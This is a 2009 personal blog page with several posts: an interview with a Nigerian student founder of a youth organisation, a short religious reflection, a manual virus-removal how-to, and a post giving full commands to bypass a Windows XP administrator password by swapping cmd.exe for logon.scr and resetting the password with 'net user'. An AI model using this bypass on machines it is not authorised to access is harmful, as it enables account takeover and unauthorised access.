Sunday, May 10, 2009

Life is like a Wind... fight your way

"I’ll always say life is a wind, when you back it, it takes you anywhere; but when you face it,you fight your way to where you want to go"

I spoke with one of the youths shaking their world for excellence. This guy is made it, i mean what am saying, while in school his network includes the University Senate, Lagos State Govt, Enterprenuers of high calibre etc. He's got, say money or what? He is an instrument for "Youths in schools repositionning themeslves for better" He has a business that he runs locally and internationally. I hope you would like to meet him.

Here is our conversation.

Good day Sir, Can we know you?
My name is Olayinka Olabanji, I am a student, am also the Managing Director of Whizzes Nigeria Liimited.

What School?
Federal University of Technology, AKure. 400 level Electrical Electronics Engineering.

Please tell us a little about your background?
My background, born and bread in Akure, Ondo State, a native of Ekiti State, Ado-Ekiti to be précised. I have three siblings. My father is a businessman, my mother a civil servant.

What was your first year in University like?
My first year was interesting, I had a reason to design my purpose, to state what I want, and most importantly I saw everything green, everything about the environment was green and untouched.

Yes, there are a lot of open opportunities here if you open your eyes to see them

You are the founder of Whizzes Nigeria Limited
By God’s grace, yes

What is the organization all about?
It’s a dream born out of passion of believe in Nigerian youths, so far so good everything we’ve been doing has been to Cather and redefine the way every Nigerian youths should live his life.
"Whizzes" is from the word Whiz which means someone who is fast and accurate in what he or she is doing, and that is what the Nigerian youths are.

What do u do?
One of the things we do is to organize seminars for youths in Universities, publish whizzes magazine (check our website) that is why I said the purpose behind whizzes is to redefine the purpose of living.

What made u think of bringing out such an organization?
Looking at the environment; we realize our leaders keep saying the youth are the leaders of tomorrow, but they have never done anything to make the youth believe in themselves. Every program that they get involve in is to enrich them, or even getyouths as political thugs. Then I asked a question, if they were youths (thugs) when they were young, will they be leaders today? No, but I believe in the future of Nigerian youths. In general if the environment is conducive they will perform that is if the environment is conducive Nigerian youths are whizzes because they will be fast, accurate and intelligent

Was there any challenge while starting up?
There will always be challenges and challenges will never stop coming.

Please tell us some of these challenges
It takes you to convince people to believe in your dream and as you climb up the lather some of them will surely fade away. The peak of the issue is that you will be alone, the biggest of all challenges iswhen you look around and nobody to support you.

How did you manage these challenges?
I managed the challenges through God; he gives the strength, he has been present and will always be present.

How do manage your academics with your business?
It has not been easy, but God has given me the wisdom to apply knowledge, which has made me understand the environment of my academic and my business.

What is your philosophy, I mean the belief that keeps you going?
My belief is the world is small and life is short, do what you can do, when you have the time and give it your best.

What is your advice to Nigerian Youths?
Nigeria is the best place they can be. God has a choice, he will have sent them to any of the developed nations, yet he choose to send them to Nigeria, so that they will be part of the development of what they will be Nigeria. They should take advantage; they should love the country because it’s always getting better.

What words would you like to live for people you meet?
I’ll always say life is a wind when you back it, it takes you anywhere, but when you face it, you fight your way to where you want to go

God bless Nigeria!

It is nice meeting you sir,

It’s nice spending time with you.

For more information, magazines, seminars and trainings contact Whizzes Nigeria Limited on 2348035763914 or

Saturday, March 28, 2009

Hacking a Windows XP Admin Password

Don't get this wrong, am not blogging this to take advantage of damaging other computers, but to know Windows vulnerablity and protect your computer from being hacked.

A lot of us are not intelligent (including myself) to protected all our admin user1 - 6 login, instead we protect only the admin.

To hack a Windows XP, at boot up press F8 keep presseing it untiil the sreen shows up booting menu. Choose the save mode login, it loads reads some files and then comes up with an adminstrative login and your account login. Enter the system thru the adminstrative which definately may not be passworded.

The goal is to access the command prompt without using the users account.

Now that you are in the system. Open the shell or command line (prompt)
redirect the destination by pressing cd\

and then type the following, the * is the comment

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

The code, deletes the logon screen, backs it up in temphack folder and changes the cmd line to the logon.scr.

So, at start up, DOS prompt comes up,you'll see somthing like this:

"net user password"

Where the real password is the admin name, type the password of your choose to access the system.

assumming the original passoword is mcemmy and u want to access it with geek

net user mcemmy geek

will simply use the geekas password.

Now that you know this, how can u protect your computer, simply password all the 6 users on your computer. most of us have only one password.

Enjoy !

Monday, March 9, 2009


Do you know you can remove a virus without using an anti-virus. Anti-virus searches your computer for files that are already stored in its database and ask you for the next point of action.

Let’s take EXPLORER.EXE as an example.

Symptoms: Your documents folder opens at start up. 

First go to the Windows Task Manager (Press ctrl + alt+ Del) and stop the process EXPLORER.EXE

Go to the System Configuration Utility Windows by typing “msconfig” in the run input box from the start menu. From the start-up tab uncheck EXPLORER.EXE, and then confirm changing by clicking apply. (This disables the virus from running when you boot your computer). 

Search your System32 folder for the virus file. (C:\WINDOWS\system32) From the Tool tab on the menu bar: Folder Options > Views, check the the option show hidden file and folders. Search for EXPLORER.EXE and autorun.inf then delete.

Go to Registry typing “regedit” in the run input box, search for EXPLORER.EXE and delete.

Congratulations. Your computer is free from EXPLORER.EXE


Yesterday , I was watching the “Nigerian Hip-hop Award”, all through the program, I caught something from Cohbams when he was called out to give his word for the award he received, he said “ All the things you saw me doing out there was not me, there are better guys than me who are worth this award. I don’t worth this. And I will like to say that it is not my own power or skill, but by the strength of God. I also thank my mum ….. without them I am nobody”.

Today, I listened to the pastor preach in the Sunday service. “There is nothing you have that you didn’t receive, some thought all they have are results of there hard work or labor, but there some who work harder than they do but get less. If you earn everything, how about the air you breath”

The basis of all these is: Everything you have, you received, and there is nothing you have in this life that you didn’t receive. Give what you receive. The more you give, the more you receive. Give glory to God for everything you have, and always remember that you are not the best person to receive what you have, it’s God grace and mercy. Do well to all men.

“Give the world the best you have and the best will come back to you”

- Sonya Carson